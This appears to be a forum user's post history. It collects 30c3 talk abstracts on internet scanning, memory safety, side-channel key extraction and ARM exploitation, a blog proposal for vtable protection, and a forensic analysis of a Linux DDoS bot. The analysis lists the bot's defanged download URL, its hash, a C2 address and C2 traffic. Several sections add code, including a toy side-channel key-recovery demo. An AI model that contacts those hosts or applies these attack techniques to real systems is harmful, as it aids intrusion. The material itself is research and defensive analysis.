Everything posted by Nytro

  1. [h=1]Fast Internet-wide Scanning and its Security Applications [30c3][/h] Internet-wide network scanning has powerful security applications, including exposing new vulnerabilities, tracking their mitigation, and exposing hidden services. Unfortunately, probing the entire public address space with standard tools like Nmap requires either months of time or large clusters of machines. In this talk, I'll demonstrate ZMap, an open-source network scanner developed by my research group that is designed from the ground up to perform Internet-wide scans efficiently. We've used ZMap with a gigabit Ethernet uplink to survey the entire IPv4 address space in under 45 minutes from a single machine, more than 1300 times faster than Nmap. I'll explain how ZMap's architecture enables such high performance. We'll then work through a series of practical examples that explore the security applications of very fast Internet-scale scanning, both offensive and defensive. I'll talk about results and experiences from conducting more than 300 Internet-wide scans over the past 18 months, including new revelations about the state of the HTTPS CA ecosystem. I'll discuss the reactions our scans have generated--on one occasion we were mistaken for an Iranian attack against U.S. banks and we received a visit from the FBI--and I'll suggest guidelines and best practices for good Internet citizenship while scanning.

Internet-scale network surveys collect data by probing large subsets of the public IP address space. While such scanning behavior is often associated with botnets and worms, it has also proved to be a powerful methodology for security research. Recent studies, beginning with the EFF's SSL Observatory, have demonstrated that Internet-wide scanning can help reveal new kinds of vulnerabilities, monitor deployment of mitigations, and shed light on previously opaque distributed ecosystems. 
Unfortunately, this methodology has been more accessible to attackers than to researchers without access to botnets or willingness to spread self-replicating code. Comprehensively scanning the public address space with off-the-shelf tools like Nmap requires weeks of time or many machines. To make Internet-wide scanning more accessible, my research team recently introduced ZMap, an open-source network scanner that is designed from the ground up to perform Internet-scale port scans. In our tests using a gigabit Ethernet uplink, ZMap scans the entire IPv4 address space in under 45 minutes from a single machine, more than 1300 times faster than Nmap. By the time of the talk, we'll have switched to a 10 gigE uplink, which should theoretically support scanning the entire address space in under 5 minutes. I'll explain how ZMap's architecture enables such high performance by taking advantage of fast modern hardware and recent improvements to the Linux kernel. We'll work through a series of practical examples that explore the security applications of very fast Internet-scale scanning, both offensive and defensive, and I'll share experiences from conducting more than 300 Internet-wide scans over the past 18 months, totaling well over 1 trillion probes. I'll describe how we completed hundreds of scans targeting every public HTTPS server (each scan larger than the entire SSL Observatory) in order to shed light on the growth of HTTPS deployments and expose security problems within the HTTPS ecosystem, such as misissued CA certs and widespread server misconfiguration. I'll show how high-speed scanning can be used to expose vulnerable hosts, using IPMI and UPnP vulnerabilities as recent examples. Malicious attackers could abuse this capability to exploit 0day vulnerabilities affecting millions of hosts within hours of a problem's discovery, and better defenses are badly needed. 
Finally, I'll discuss applications to Internet freedom, including discovering unadvertised services such as hidden Tor bridges (used for censorship resistance) and Bluecoat devices (used for state-sponsored censorship). High-speed scanning can be a powerful tool in the hands of security researchers, but users must be careful not to cause harm by inadvertently overloading networks or causing unnecessary work for network administrators. I'll discuss the complaints and other reactions my group's scanning has generated--on one occasion we were mistaken for an Iranian DoS attack on U.S. banks, and we received a visit from the FBI--and I'll suggest several guidelines and best practices for good Internet citizenship while scanning. Speaker: J. Alex Halderman EventID: 5533 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by
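The abstract stays high level, but the core trick behind ZMap's speed (stateless probing) is easy to sketch: instead of tracking per-target state, the scanner derives each probe's TCP sequence number from a MAC of the target, so any response can be validated with no lookup table. A minimal Python sketch of that idea; the key name and scheme details here are illustrative, not ZMap's actual implementation:

```python
import hashlib
import hmac

SECRET = b"per-scan secret"  # hypothetical per-scan key


def probe_seq(ip: str, port: int) -> int:
    """Derive the 32-bit TCP sequence number for a SYN probe from a MAC
    of the target, so no per-host state needs to be stored."""
    mac = hmac.new(SECRET, f"{ip}:{port}".encode(), hashlib.sha256)
    return int.from_bytes(mac.digest()[:4], "big")


def validate_synack(src_ip: str, src_port: int, ack: int) -> bool:
    """A legitimate SYN-ACK acknowledges our sequence number + 1; anything
    else (spoofed or stale traffic) is discarded statelessly."""
    return ack == (probe_seq(src_ip, src_port) + 1) % 2**32
```

Validation then costs one MAC computation per response, rather than a table of billions of outstanding probes.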
  2. [h=1]Bug class genocide [30c3][/h] Applying science to eliminate 100% of buffer overflows. Violation of memory safety is still a major source of vulnerabilities in everyday systems. This talk presents the state of the art in compiler instrumentation to completely eliminate such vulnerabilities in C/C++ software. The hacker community has a lot of words for situations in which access to the wrong part of memory leads to an exploitable vulnerability: buffer overflow, integer overflow, stack smashing, heap overflow, use-after-free, double free and so on. Different words are used because the techniques to trigger the faulty memory access and to subsequently use it to gain code execution vary, but they all share a common root cause: violation of spatial and temporal memory safety. If one looks at the C/C++ standards, the situations that tend to be exploitable are "undefined". Usually, compiler writers take that as an excuse to cut corners, to gain that extra bit of performance in the benchmarks. Because, you know, who cares if you're exploitable when you make a mistake, look how fast it is! However, the standards also allow the compiler to introduce safety checks, to see whether access through a pointer actually touches the inside of an allocated object instead of the outside (spatial memory safety), and to make sure that the pointer being accessed actually points to an object that has been allocated, but not yet freed again (temporal memory safety). Such compilers do exist, in the form of LLVM with specialized optimizer passes that introduce runtime safety checks. This talk will look into the details of the implementation, the performance impact, practical handling, and of course, whether it really delivers the promised 100% protection against buffer overflows. 
Speaker: Andreas Bogk EventID: 5412 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
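The spatial/temporal distinction in the abstract above can be made concrete with a toy model (illustrative only, not the LLVM instrumentation the talk describes): every allocation records its size and liveness, and every access is checked against both before it is allowed.

```python
class CheckedHeap:
    """Toy model of the spatial and temporal memory-safety checks
    a hardened compiler inserts around pointer accesses."""

    def __init__(self):
        self.allocations = {}  # object id -> [size, live?]
        self.next_id = 0

    def malloc(self, size):
        obj = self.next_id
        self.next_id += 1
        self.allocations[obj] = [size, True]
        return obj

    def free(self, obj):
        # Mark dead rather than forget, so use-after-free is detectable.
        self.allocations[obj][1] = False

    def access(self, obj, offset):
        size, live = self.allocations[obj]
        if not live:
            raise RuntimeError("temporal violation: use-after-free")
        if not 0 <= offset < size:
            raise RuntimeError("spatial violation: out-of-bounds access")
```

An out-of-bounds offset trips the spatial check; touching a freed object trips the temporal check.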
  3. [h=1]How to Build a Mind - Artificial Intelligence Reloaded [30c3][/h] A foray into the present, future and ideas of Artificial Intelligence. Are we going to build (beyond) human-level artificial intelligence one day? Very likely. When? Nobody knows, because the specs are not fully done yet. But let me give you some of those we already know, just to get you started. While large factions within the philosophy of mind still seem to struggle over the relationship between mind, world, meaning, intentionality, subjectivity, phenomenal experience, personhood and autonomy, Artificial Intelligence (AI) offers a clear and concise set of answers to these basic questions, as well as avenues of pursuing their eventual understanding. In the view of AI, minds are computational machines, whereby computationalism is best understood as the most contemporary version of the mechanist world view. In the lecture, I will briefly address some of the basic ideas that will underlie a unified computational model of the mind, and especially focus on a computational understanding of motivation and autonomy, representation and grounding, associative thinking, reason and creativity. Speaker: Joscha EventID: 5526 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by
  4. [h=1]FPGA 101 - Making awesome stuff with FPGAs [30c3][/h] In this talk I want to show you around in the mysterious world of Field Programmable Gate Arrays, or FPGAs for short. The aim is to give you a rough understanding of what FPGAs are good at and how they can be used in areas where conventional CPUs and microcontrollers fail us. FPGAs open up the world of high-speed serial interconnects, nanosecond event reactions and hardware fuzzing. In this lecture I will present the basics of how FPGAs work and how to program them. I will also showcase some tasks where FPGAs really shine. As an example, I will show how a 200 MHz FPGA can perform a discrete wavelet transform twice as fast as a 2.6 GHz i7. I will also show other applications where FPGAs are almost unbeatable compared to a CPU. At the end I will give you an overview of the market: what the hacker-friendly boards are, which vendor's tool chain sucks the least, etc. After this lecture you should be able to decide whether a CPU, a GPU or an FPGA could solve your problem most efficiently. Speaker: Karsten Becker EventID: 5185 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by
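For a sense of the workload behind the wavelet benchmark mentioned in the abstract, one level of the Haar discrete wavelet transform is just pairwise adds and subtracts, which an FPGA can pipeline at line rate. A reference sketch in Python (the talk doesn't say which wavelet was benchmarked, so Haar is an illustrative choice):

```python
def haar_dwt_step(signal):
    """One level of the Haar DWT: pairwise averages (approximation
    coefficients) and pairwise half-differences (detail coefficients).
    On an FPGA, every pair can be processed in parallel each clock cycle."""
    assert len(signal) % 2 == 0, "need an even number of samples"
    evens, odds = signal[::2], signal[1::2]
    approx = [(a + b) / 2 for a, b in zip(evens, odds)]
    detail = [(a - b) / 2 for a, b in zip(evens, odds)]
    return approx, detail
```

For example, `haar_dwt_step([4, 2, 6, 8])` returns `([3.0, 7.0], [1.0, -1.0])`: the pair averages and the pair half-differences.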
  5. [h=1]Reverse engineering the Wii U Gamepad [30c3][/h] A year ago, in November 2012, Nintendo released their latest home video game console: the Wii U. While most video game consoles use controllers that are very basic, the Wii U took the opposite route with a very featureful gamepad: wireless with a fairly high range, touch screen, speakers, accelerometer, video camera, and even NFC are supported by the Wii U gamepad. However, as of today, this interesting piece of hardware can only be used in conjunction with a Wii U: wireless communications are encrypted and obfuscated, and there is no documentation about the protocols used for data exchange between the console and its controller. Around December 2012, I started working with two other hackers in order to reverse engineer, document and implement the Wii U gamepad communication protocols on a PC. This talk will present our findings and show the current state of our reverse engineering efforts. When the Wii U was released, a few console hackers and I were talking about potential uses for the Wii U gamepad. However, before being able to use a Wii U gamepad as a remote controller for a robot or a quadcopter, the first step was to understand how it worked and how to communicate with it. This started our long journey of soldering wires on Flash chips, reading the H.264 specification and complaining about the lack of features in most Wi-Fi drivers and devices (on all platforms, Linux and ath9k devices being the least horrible). While some "journalists" reported that the Wii U gamepad is using the Miracast™ technology, a Wi-Fi standard, it turned out that this was never the case. Instead, Nintendo decided to reinvent four different protocols (video streaming, audio streaming, input streaming as well as a light request-reply RPC protocol), and embed them in a slightly obfuscated version of WPA2, sent over the air using 5GHz Wi-Fi 802.11n. 
A small ARM CPU is embedded in the Wii U Gamepad (codenamed DRC) and runs a realtime operating system to handle network communication. In the Wii U, another ARM CPU (codenamed DRH) does the same thing. In this presentation, we will go into the details of how we went from a 32MB binary blob to a proof of concept of Wii U gamepad "emulation" on a PC, including full documentation of the wireless communications obfuscation layer and partial documentation of the four data exchange protocols used on the gamepad. Speaker: delroth shuffle2 EventID: 5322 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by
  6. [h=1]Backdoors, Government Hacking and The Next Crypto Wars [30c3][/h] Law enforcement agencies claim they are "going dark". Encryption technologies have finally been deployed by software companies, and critically, enabled by default, such that emails are flowing over HTTPS, and disk encryption is now frequently used. Friendly telcos, once a one-stop shop for surveillance, can no longer meet the needs of our government. What are the FBI and other law enforcement agencies doing to preserve their spying capabilities? The FBI is rallying political support in Washington, DC for legislation that will give it the ability to fine Internet companies unwilling to build surveillance backdoors into their products. Even without such legislation, the US government has started to wage war against companies that offer secure communications services to their users. As the FBI's top lawyer said in 2010, "[Companies] can promise strong encryption. They just need to figure out how they can provide us plain text." At the same time, law enforcement agencies in the United States and elsewhere are acquiring the tools to hack into the computers of their own citizens. The FBI has purchased custom-built software, while other law enforcement agencies in the US and elsewhere use off-the-shelf spyware from companies like Gamma and Hacking Team. Regardless of the software they use, the capabilities are generally similar: They can enable a computer's webcam and microphone; collect real-time location data; and copy emails, web browsing records, and other documents. Speaker: Christopher Soghoian EventID: 5478 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sun, 12/29/2013 + Lizenz: CC-by
  7. [h=1]The Tor Network [30c3] (with Jacob Appelbaum)[/h] We're living in interesting times. Roger Dingledine and Jacob Appelbaum will discuss contemporary Tor Network issues related to censorship, security, privacy and anonymity online. The last several years have included major cryptographic upgrades in the Tor network, interesting academic papers on attacking the Tor network, major high-profile users breaking news about the network itself, discussions about funding, FBI/NSA exploitation of Tor Browser users, botnet-related load on the Tor network and other important topics. This talk will clarify many important topics for the Tor community and for the world at large. Speaker: Jacob arma EventID: 5423 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Fri, 12/27/2013 + Lizenz: CC-by
  8. [h=1]Extracting keys from FPGAs, OTP Tokens and Door Locks [30c3][/h] Side-Channel (and other) Attacks in Practice. Side-channel analysis (SCA) and related methods exploit physical characteristics of (cryptographic) implementations to bypass security mechanisms and extract secret keys. Yet, SCA is often considered a purely academic exercise with no impact on real systems. In this talk, we show that this is not the case: Using the example of several widespread real-world devices, we demonstrate that even seemingly secure systems can be attacked by means of SCA with limited effort. This talk briefly introduces implementation attacks and side-channel analysis (SCA) in particular. Typical side-channels like the power consumption and the EM emanation are introduced. The main focus is then on three case studies that have been conducted as part of the SCA research of the Chair for Embedded Security (Ruhr-Uni Bochum) since 2008: The first example is FPGAs that can be protected against reverse engineering and product counterfeiting with a feature called "bitstream encryption". Although the major vendors (Xilinx and Altera) use secure ciphers like AES, no countermeasures against SCA were implemented. As a second example, a widespread electronic locking system based on proprietary cryptography is analyzed. The target of the third case study is a popular one-time password token for two-factor authentication, the Yubikey 2. In all three cases, the cryptographic secrets could be recovered within a few minutes to a few hours of measurements, allowing an adversary to decrypt FPGA bitstreams, to clone Yubikeys, and to open all locks in an entire installation, respectively. In conclusion, we summarize possible countermeasures against the presented attacks and describe the communication with the respective vendors as part of a responsible disclosure process. 
Speaker: David EventID: 5417 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by
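The abstract doesn't show how a side-channel key recovery actually works, but the principle behind correlation power analysis can be demonstrated on synthetic data (a toy model, not the actual attacks on the FPGA, lock, or Yubikey targets): for each key guess, predict the Hamming weight of an intermediate value for every known input, and keep the guess whose predictions correlate best with the measured leakage.

```python
import random


def hw(x):
    """Hamming weight: the classic power-consumption leakage model."""
    return bin(x).count("1")


def pearson(xs, ys):
    """Pearson correlation coefficient, computed directly."""
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    vx = sum((x - mx) ** 2 for x in xs) ** 0.5
    vy = sum((y - my) ** 2 for y in ys) ** 0.5
    return cov / (vx * vy) if vx and vy else 0.0


def recover_key_byte(plaintexts, traces):
    """Return the key-byte guess whose HW predictions best match the traces."""
    return max(range(256),
               key=lambda g: pearson([hw(p ^ g) for p in plaintexts], traces))


# Synthetic experiment: the "device" leaks HW(p ^ KEY) plus a little noise.
random.seed(1)
KEY = 0x42  # the secret the attacker wants to recover
pts = [random.randrange(256) for _ in range(500)]
traces = [hw(p ^ KEY) + random.gauss(0, 0.5) for p in pts]
```

With this toy leakage model the correct guess correlates near 1.0 while every wrong guess is noticeably lower, so `recover_key_byte(pts, traces)` returns `0x42`; real attacks differ mainly in needing a nonlinear target (e.g. an S-box output) and many more traces.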
  9. [h=1]The philosophy of hacking [30c3][/h] Contemplations on the essence of hacking and its implications for hacker ethics. Modern society's use of technology as an instrument for domination is deeply problematic. Are instrumentality and domination inherent to the essence of technology? Can hacking provide an alternative approach to technology which can overcome this? How do art and beauty fit into this approach? In order to understand the essence of hacking, it is important to first critically examine the essence of (modern) technology and the rationalization of technological development. Because for all the wonderful things technology has given us, it has also brought us a vast array of instruments for domination, ranging from nuclear warheads to the panoptic surveillance state. As a community that is so deeply involved with technology, it is imperative for us to comprehend that these developments did not come out of thin air and that we have the choice to follow a different path. Understanding Heidegger's notion of enframing as the product of historical rationalization gives us insight into the relation between the objective, scientific approach to technology and its instrumentalization as a means for domination. Yet it also highlights the subversive potential of hacker cultures. The hackers' playful curiosity and desire to express creativity within the computer-imposed frameworks of formal logic has the potential to transcend code into poetry, reconnecting techne with poiesis and mapping the road towards the revealing nature of technology. Hacking has the potential to elevate abstract technological mechanisms and relations dissociated from the individual to the plane of the utmost concrete and subjective images. 
As the creative output of the hacker both adheres to the formal methods of boolean logic and at the same time challenges them by devoiding them of their rational finalities, the positivist rationale of what we hold to be most objective can be turned into an expression of the subject. I will argue that this repositioning of the subject provides the basis for transforming the technological rationale into one that is aimed at liberation. Speaker: groente EventID: 5278 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Mon, 12/30/2013 + Lizenz: CC-by
  10. [h=1]Hardware Attacks, Advanced ARM Exploitation, and Android Hacking[/h] In this talk (which in part was delivered at Infiltrate 2013 and NoSuchCon 2013) we will discuss our recent research that is being rolled into our Practical ARM Exploitation course (sold out at Blackhat this year and last) on Linux and Android (for embedded applications and mobile devices). We will also demonstrate these techniques and discuss how we were able to discover them using several ARM hardware development platforms that we custom built. Where relevant, we will also discuss ARM exploitation as it relates to Android, as we wrote about in the "Android Hacker's Handbook", which we co-authored and which will be released in October 2013. Lastly, we will also discuss some of our most recent related hardware research (to facilitate the above), which will include bus protocol eavesdropping/reverse engineering, demystifying hardware debugging, and surreptitiously obtaining embedded software (firmware) using hardware techniques. We will demonstrate and show the supportive tools used and techniques developed to perform this work and deploy them against Apple MFi iAP devices, and multimedia devices using OEM-implemented USB stacks. (This will briefly include our experiences around starting int3.cc - Tools for the Talented, where we sell a fully assembled modified version of a hardware USB fuzzer.) Along the way we will inevitably share some of the lessons we learned while completely designing the hardware (from scratch), writing the firmware, and building the mobile apps for an embedded security device called Osprey that we hold the patent for and have spoken about publicly as a hardware vulnerability assessment Swiss-army knife for researchers. Speaker: Stephen A. 
Ridley EventID: 5193 Event: 30th Chaos Communication Congress [30c3] by the Chaos Computer Club [CCC] Location: Congress Centrum Hamburg (CCH); Am Dammtor; Marseiller Straße; 20355 Hamburg; Germany Language: english Begin: Sat, 12/28/2013 + Lizenz: CC-by
  11. [h=1]vtable protections: fast and thorough?[/h] Recently, there's been a reasonable amount of activity in the vtable protection space. Most of it is compiler-based. For example, there's the GCC-based virtual table verification, a.k.a. VTV. There are also multiple experiments based on clang / LLVM and of course MSVC's vtguard. In the non-compiler space, there's Blink's heap partitioning, enabled by PartitionAlloc. It seems, though, that these various techniques require the user to choose between "fast" or "thorough protection". This isn't ideal. Shortly, I'll document my own idea for how to try and get both fast and thorough. But first, a recap on what we mean by fast and thorough.

Fast vtable protection
Protecting vtables typically involves inserting machine instructions around vtable pointer loads or virtual calls. Going fast is simple: only insert a very small number of fast instructions (i.e. no hard-to-predict branches). This is the approach taken by vtguard. If you look at page 14 in the vtguard PDF linked above, you'll see that there's just a single cmp and a single jne (short, and never taken in normal execution) added to the hot path. Tangentially, another task commonly undertaken when adding vtable protections to a given program is to remove as many virtual calls as possible, by annotating classes and methods with the "final" keyword and/or applying whole-program optimizations.

Thorough vtable protection
Describing what we want in a thorough vtable protection is a little more involved. We want:
• Defeating ASLR does not defeat the vtable check. (vtguard lacks this property, whereas the GCC implementation has it.)
• Only a valid vtable pointer can be used. Furthermore, only a vtable pointer corresponding to the correct hierarchy for the call site can be used.
• Ideally, only a vtable pointer corresponding to the correct hierarchy level for the call site can be used.

A fast solution for thorough vtable protection?
How can we get all of the protections above and get them fast? My idea revolves around separating the problem into two pieces:
1. Work out whether we can trust the vtable pointer or not.
2. Validate that the class type represented by the vtable pointer is appropriate for the call site.

To trust or not to trust?
Current schemes trust the vtable pointer or not based either on some secret (vtguard, the xor-based LLVM approach), a fixed table of valid values (GCC, some LLVM approaches) or by constraining the values that might appear in the vtable position (heap partitioning). The new scheme would be to reserve a certain portion of the address space for vtables. We know that nothing else can be mapped there, so by suitably masking any proposed vtable pointer, we know it is valid. I haven't fully thought this through for 32-bit, but look at this 64-bit variant:
• Host vtables in the lower 4GB of address space.
• Use the dereference of a 32-bit register to load the vtable entry. This provides masking for free and even saves a byte in the instruction sequence. It works because loading 4 bytes into a 64-bit register zero-extends the result.
• Optionally, save memory by having the compiler use 4-byte vtables.
This scheme is approximately free, maybe even performance-positive in some situations. Furthermore, one possible implementation is to stop somewhere around here for a very fast protection scheme that is "ok" in thoroughness. On the downside, you've lost the 64-bit invariant that "nothing is mapped in the bottom 4GB", but the percentage of space used is going to be small. If that bothers us, then we can use the same trick to load a 4-byte vtable pointer and then "or" it with 0x100000000 (use bts if you dare) or some other value.

Validating class type
Once you know you trust your vtable pointer, validating the class type becomes a lot simpler. 
Instead of messing with secrets inside the vtable, you can just store a compact representation of the class type inside the vtable, with the aim of satisfying validation needs with a single compare. The one trick we want to play is to make it easy to validate various different positions in a class hierarchy with minimal work. To do this, we can store class details in a hierarchical format. To take a simple case, imagine that we have the following classes in the system: A1, A1:B1, A2, A2:B1, A2:B1:C1. We encode these using one byte per hierarchy level, the basemost class being the LSB (in hex): 0x00000001, 0x00000101, 0x00000002, 0x00000102, 0x00010102. (Note that this will be an approximation. For example, if you have more than 256 basemost classes with virtual functions, you would need to represent the first level with 2 or more bytes.) Finally, our "is this object of the correct type for the call site?" check becomes a simple compare. Depending on the position in the hierarchy, we may be able to achieve the compare with no masking and therefore a single instruction. For example, for a call site expecting an object of type A1, it's just "cmpb $1, (%eax)". That's a 4-byte sequence, which is much shorter than the 10-byte sequence noted in the vtguard PDF. For a call site expecting an object of type A2:B1, it's "cmpw $0x102, (%eax)".

Closing notes
Will it work well? Who knows. I haven't had time to implement this, nor am I likely to in the near future. Feel free to take this and run with it. Note that this idea doesn't cover what to do with raw function pointer calls. If you want to head towards complete control flow integrity, you'll want to look at protecting those, as well as return addresses (the current canary-based stack defenses do nothing against an arbitrary read/write primitive). Posted by Chris at 5:11 PM Source: Security: vtable protections: fast and thorough?
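The hierarchical encoding is straightforward to model. A small Python sketch of the scheme as described (the real thing would be one or two compare instructions emitted by the compiler, not a function call):

```python
def type_id(path):
    """Pack a hierarchy path, e.g. [1] for A1 or [2, 1] for A2:B1, into an
    integer: one byte per level, basemost class in the least-significant byte."""
    tid = 0
    for level, class_num in enumerate(path):
        tid |= class_num << (8 * level)
    return tid


def callsite_check(object_tid, expected_path):
    """A call site expecting a depth-n type compares only the low n bytes,
    so any subclass of the expected type passes the same single compare."""
    depth = len(expected_path)
    mask = (1 << (8 * depth)) - 1
    return (object_tid & mask) == type_id(expected_path)


# The classes from the post: A1, A1:B1, A2, A2:B1, A2:B1:C1
A1, A1B1 = type_id([1]), type_id([1, 1])
A2, A2B1, A2B1C1 = type_id([2]), type_id([2, 1]), type_id([2, 1, 1])
```

This reproduces the encodings above (`A2B1 == 0x0102`, `A2B1C1 == 0x010102`), and a call site expecting A1 accepts an A1:B1 object by comparing only the low byte, exactly what the `cmpb $1, (%eax)` example does.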
  12. [h=1]Another look at a cross-platform DDoS botnet[/h] I learned from a recent "Malware Must Die" post about a Linux malware sample that is associated with DNS amplification attacks. As mentioned in the MMD post, several researchers have posted on this or similar malware. Since I'm particularly interested in Linux malware, especially if it has a DDoS component, I thought I'd also take a look. I was able to get the malware to execute on my Linux sandbox and connect to the C&C. While I've yet to see any DDoS-related activity, I did pcap the C2 comms and snap an image for Volatility analysis. Links to the pcap and memory image can be found at the bottom of this post.

The malware was downloaded from hxxp://198.2. [.] 192.204:22/disknyp
The MD5 hash value of the sample I obtained is 260533ebd353c3075c9dddf7784e86f9
The C2 is located at 190.115.20.27:59870

Referencing the supplied pcap, the compromised host connected to the C2 at 18:46 EST. Upon connection to the C2, the compromised host sends information about the current Linux kernel, in this case, "Linux 2.6.32-33-generic-pae".

[Image: bot sending kernel info to C2]

It's interesting to note that the bot's C2 communication is via a persistent connection. Unlike typical HTTP bot check-in traffic, this bot maintains a connection to the remote host on port 59870. Since this is all one huge session, if you attempt "Follow TCP stream" in Wireshark, it will take a bit of time to present the output. The C2 then sends 4 bytes, "0x04 0x00 0x00 0x00", upon which the bot sends back 27 bytes of all 0x00. At 21:13, the C2 sends 75 bytes of hex:

[Image: initial 75-byte sequence from C2 to bot]

Approximately 
every thirty seconds, the C2 sends a new 75-byte sequence to the bot, for example:

01:00:00:00:43:00:00:00:00:fd:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c6:9c:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9c:50:00
01:00:00:00:43:00:00:00:00:fe:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c7:d4:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c7:d4:50:00
01:00:00:00:43:00:00:00:00:ff:05:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:d4:07:c6:9b:50:00:01:00:00:00:00:00:00:00:1e:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:d4:07:c6:9b:50:00

Decimal byte offset 9 appears to be a counter, incrementing by one with each sequence from the C2. The contents at decimal offsets 28 and 71 initially vary between 0xC6 and 0xC7. This continues until 22:06 EST, when the pattern changes and varied values are seen:

01:00:00:00:43:00:00:00:00:1d:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:73:ee:ed:f5:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:73:ee:ed:f5:58:1b
01:00:00:00:43:00:00:00:00:1e:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:7a:e0:22:c7:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:7a:e0:22:c7:58:1b
01:00:00:00:43:00:00:00:00:1f:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:0e:11:5f:4a:58:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:0e:11:5f:4a:58:1b
01:00:00:00:43:00:00:00:00:20:06:00:00:00:00:00:00:01:00:00:00:01:00:00:00:80:3d:84:e6:15:5b:1b:01:00:00:00:00:00:00:00:0c:00:00:00:00:04:00:00:00:04:00:00:10:27:60:ea:ac:f5:a5:8f:ac:f5:a5:8f:00:00:00:00:00:3d:84:e6:15:5b:1b

The bot again replies with a 27-byte sequence; however, 
decimal offset 19 now has a value that will vary between 0 and 2.

00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:01:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00

Volatility

Some basic Volatility analysis of the memory image yields the following:

linux_pslist

[Image: linux_pslist]

The 'disknyp' process started at 23:45 UTC with PID 1241. It ran with user privileges, and no child processes were noted.

linux_lsof -p 1241

[Image: linux_lsof for PID 1241]

Process 'disknyp', PID 1241, has /dev/null open as well as socket:[6931].

linux_proc_maps

[Image: linux_proc_maps for PID 1241]

Note that /tmp/disknyp is the path where 'disknyp' was originally executed. Dumping the two segments at '/usr/tmp' produces two files, 'task.1241.0x8048000.vma' and 'task.1241.0x8168000.vma'. Running 'file' on the segments shows:

task.1241.0x8048000.vma: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Dumping strings for that segment shows:

[Image: section of 'strings' output for PID 1241 segment 0x8048000]

We note the string "fake.cfg" that was mentioned in other posts related to this malware.
Attempting to find the file in the original /tmp directory:

[Image: linux_find_file for 'fake.cfg']

linux_yarascan

Let's use the 'yarascan' plugin to see if there are any other references to 'fake.cfg' in this image.

[Image: searching for other references to 'fake.cfg' using the linux_yarascan plugin]

We see that the string 'fake.cfg' is only found in PID 1241, 'disknyp'. Again using the 'linux_find_file' plugin, we can dump the contents of 'fake.cfg' located at inode 0xed9dc088.

[Image: contents of 'fake.cfg']

Final Thoughts

This appears to be some proof-of-concept or "testing" malware. There are several aspects of this sample that make me wonder if it was just put out there to see how quickly it would be detected and analyzed:

- Analysis of the original file as downloaded from hxxp://198.2. [.] 192.204:22/disknyp shows that it is statically linked, not stripped.
- The C2 communication is somewhat noisy. Maintaining a persistent connection with check-ins every few seconds is not very stealthy.
- No attempt is made to hide the process. In hours of running this, I didn't see any child processes or variance in the process on the local host.
- 'fake.cfg' is created in the malware's working directory. 'fake.cfg'? Really?

